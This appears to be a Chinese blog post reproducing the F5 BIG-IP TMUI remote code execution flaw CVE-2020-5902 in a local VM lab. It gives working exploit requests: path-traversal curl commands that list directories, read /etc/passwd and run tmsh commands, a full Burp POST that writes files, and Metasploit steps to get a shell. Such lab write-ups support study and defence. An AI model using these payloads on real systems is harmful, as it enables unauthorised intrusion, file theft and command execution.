CVE-2020-5902漏洞复现

本文首发于我的个人博客

2020年7月1日,F5官方公布流量管理用户界面(TMUI)存在 前台远程执行代码(RCE)漏洞(CVE-2020-5902)。攻击者利用该漏洞,构造恶意请求,在未授权的情况下获得目标服务器的权限,实现远程代码执行。

未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。该漏洞影响控制面板受影响,不影响数据面板。

实验环境

Kali Linux

BIGIP 15.0.0-0.0.39.ALL-vmware(官网我试了好几个按照NVD的信息本应存在漏洞的版本,但只有这个能扫描到漏洞)

复现过程

1. BIGIP环境配置

登陆页面注册账号。

打开下载页面,选择合适版本的ova文件下载,下载完成后,打开vmware,点击打开虚拟机,选择刚才下载的ova文件,将虚拟机导入。导入成功后,打开虚拟机设置,将第一个网络适配器改成NAT模式。然后开启虚拟机,默认账户名为root,密码为default,首次登录后需要更换密码。

01
02

输入config配置网卡信息,IP地址默认为192.168.1.245,需要自己按照NAT模式配置一下。配置完成后,只要能够ping通192.168.227.1(具体要看本机NAT模式配置)即可。

03

在浏览器中访问https://192.168.227.156,可以访问,输入用户名admin和密码(刚才自己设置的)就可以正常登录了。当这里环境配置成功。

2. 扫描漏洞

下载nmap的漏洞扫描脚本,然后进行扫描,得到以下结果,说明漏洞存在。

nmap --script=脚本名称 -p 443 192.168.227.156

04

3. msf获取shell

msfconsole
search cve-2020-5902
use 0

05
设置好相关的options后,输入exploit进行攻击,获取shell。

06

4. 目录遍历

curl -v -k  'https://F5 IP地址/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/'

07

因为内容太多了,显示不全。

5. 文件读取

curl -v -k  'https://F5 ip地址/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

08

6. 文件上传

使用Burp Suite.

Request内容如下(Cookie需要自己设置):

POST /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: JSESSIONID=9664B664C2FE55DF0F1019789C496E09;
X-Forwarded-For: 8.8.8.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
fileName=/tmp/1.txt&content=CVE-2020-5902

09

在BIGIP虚拟机查看:

10

7. 命令执行

curl -v -k  'https://F5 IP地址/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

11

©️2020 CSDN 皮肤主题: 深蓝海洋 设计师:CSDN官方博客 返回首页